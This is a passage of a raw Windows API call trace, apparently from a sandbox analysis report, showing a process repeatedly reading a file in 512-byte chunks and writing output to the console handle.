(_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.970] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.970] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.971] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.971] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.971] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] GetFileType (hFile=0x50) returned 0x1 [0177.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.972] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.972] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.972] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.973] GetFileType (hFile=0x50) returned 0x1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.973] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.974] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.974] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.008] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.008] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.008] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.008] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.008] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.008] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.009] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.010] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.011] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.012] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: 